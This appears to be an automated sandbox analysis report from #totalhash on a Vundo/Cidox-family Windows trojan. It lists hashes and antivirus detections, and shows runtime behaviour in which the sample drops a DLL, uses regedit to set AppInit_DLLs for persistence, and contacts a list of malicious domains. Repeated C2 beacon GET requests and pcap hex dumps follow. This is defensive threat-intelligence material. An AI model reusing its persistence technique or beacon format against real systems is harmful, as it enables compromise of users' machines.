Analysis | #totalhash

Analysis Date	2014-11-13 15:37:36
MD5	8dc8a182ba353a7a6fc1a32eeab4a8a7
SHA1	8b0f40cfebc665fc5e984beb22fbf06a013ef7f2

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: e10d299aee81c43ede6107cfd694d791 sha1: 909378f88f1bea29f23636abfaaed914d07407ed size: 157696
Section	.rdata md5: 452932fb0f06ef597e216a44a5a4add4 sha1: fa8bd755ad0b66dde6fdd0798d3a1066b832aa0d size: 7680
Section	.data md5: d5ca73063f2caf403729291c844e9b5e sha1: df79fd8183ccbecf49fb3180517e27eae6840db0 size: 3584
Section	.rsrc md5: c96411e822dfe10e0259a74d0993b494 sha1: 9710ea17765291062c919b03c379ee0952609606 size: 20480
Timestamp	2012-10-12 22:17:17
Packer	Microsoft Visual C++ ?.?
PEhash	d90c42a2eaefe18856e200358c6cd6afd03c4bc1
IMPhash	69b9295363fc8d11cadadd4e040942b4
AV	360 Safe	Gen:Variant.Symmi.5161
AV	Ad-Aware	Gen:Variant.Symmi.5161
AV	Alwil (avast)	Vundo-XR [Trj]
AV	Arcabit (arcavir)	no_virus
AV	Authentium	W32/Cidox.A.gen!Eldorado
AV	Avira (antivir)	TR/Vundo.Gen8
AV	BullGuard	Gen:Variant.Symmi.5161
AV	CA (E-Trust Ino)	Win32/Vundo.N!generic
AV	CAT (quickheal)	no_virus
AV	ClamAV	no_virus
AV	Dr. Web	Trojan.Mayachok.17986
AV	Emsisoft	Gen:Variant.Symmi.5161
AV	Eset (nod32)	Win32/Kryptik.ANDO
AV	Fortinet	W32/Cidox.AND!tr
AV	Frisk (f-prot)	W32/Cidox.A.gen!Eldorado
AV	F-Secure	Gen:Variant.Symmi.5161
AV	Grisoft (avg)	BackDoor.Generic15.CNOC
AV	Ikarus	Trojan-Downloader.Win32.Vundo
AV	K7	no_virus
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	Trojan.Agent
AV	Mcafee	no_virus
AV	Microsoft Security Essentials	TrojanDropper:Win32/Vundo.V
AV	MicroWorld (escan)	Gen:Variant.Symmi.5161
AV	Norman	Gen:Variant.Symmi.5161
AV	Rising	no_virus
AV	Sophos	Troj/Vundo-AK
AV	Symantec	no_virus
AV	Trend Micro	TROJ_SPNR.30L412
AV	VirusBlokAda (vba32)	no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry	HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File	\Device\Afd\Endpoint
Creates File	C:\WINDOWS\system32\sqgyarh.dll
Creates File	C:\Documents and Settings\Administrator\Cookies\cf
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process	C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS	clickbeta.ru
Winsock DNS	91.220.35.154
Winsock DNS	veroconma.com
Winsock DNS	terrans.su
Winsock DNS	getinball.com
Winsock DNS	theloamva.com
Winsock DNS	tryatdns.com
Winsock DNS	clickclans.ru
Winsock DNS	dentagod.com
Winsock DNS	denareclick.com
Winsock DNS	debijonda.com
Winsock DNS	fescheck.com
Winsock DNS	liteworns.com
Winsock DNS	getintsu.com
Winsock DNS	nshouse1.com
Winsock DNS	vengibit.com
Winsock DNS	tryangets.com
Winsock DNS	netrovad.com
Winsock DNS	vornedix.com
Winsock DNS	inzavora.com
Winsock DNS	getavodes.com
Winsock DNS	clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\sqgyarh.dll\\x00

Network Details:

DNS	debijonda.com Type: A 141.8.225.80
DNS	veroconma.com Type: A 74.117.179.241
DNS	theloamva.com Type: A 141.8.225.80
DNS	vornedix.com Type: A 141.8.225.80
DNS	dentagod.com Type: A 141.8.225.80
DNS	liteworns.com Type: A 141.8.225.80
DNS	vengibit.com Type: A 141.8.225.80
DNS	tryangets.com Type: A 141.8.225.80
DNS	getintsu.com Type: A 141.8.225.80
DNS	getavodes.com Type: A 141.8.225.80
DNS	tryatdns.com Type: A 209.222.14.3
DNS	fescheck.com Type: A 209.222.14.3
DNS	inzavora.com Type: A 141.8.225.80
DNS	getinball.com Type: A
DNS	netrovad.com Type: A
DNS	terrans.su Type: A
DNS	clickstano.com Type: A
DNS	denareclick.com Type: A
DNS	clickbeta.ru Type: A
DNS	nshouse1.com Type: A
DNS	clickclans.ru Type: A
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc4+XrHWaR8LY User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc/kCGdp9ZUYD User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc/kCGdp9ZUYD User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc2t5PIYtxQ5I User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc2t5PIYtxQ5I User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc0h/HPjHB2Lt User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc4sB3kaad+Ty User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45GcwuHiebXOh2A User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45GcyqXAfbKaZgr User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc1/idPwODnqc User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1032 ➝ 74.117.179.241:80
Flows TCP	192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1041 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1042 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1043 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1044 ➝ 91.220.35.154:80

Raw Pcap

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   4763342b 58724857 6152384c 59204854   Gc4+XrHWaR8LY HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47632f6b 43476470 395a5559 44204854   Gc/kCGdp9ZUYD HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47632f6b 43476470 395a5559 44204854   Gc/kCGdp9ZUYD HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633274 35504959 74785135 49204854   Gc2t5PIYtxQ5I HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633274 35504959 74785135 49204854   Gc2t5PIYtxQ5I HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633068 2f48506a 4842324c 74204854   Gc0h/HPjHB2Lt HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633473 42336b61 61642b54 79204854   Gc4sB3kaad+Ty HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47637775 48696562 584f6832 41204854   GcwuHiebXOh2A HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47637971 58416662 4b615a67 72204854   GcyqXAfbKaZgr HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
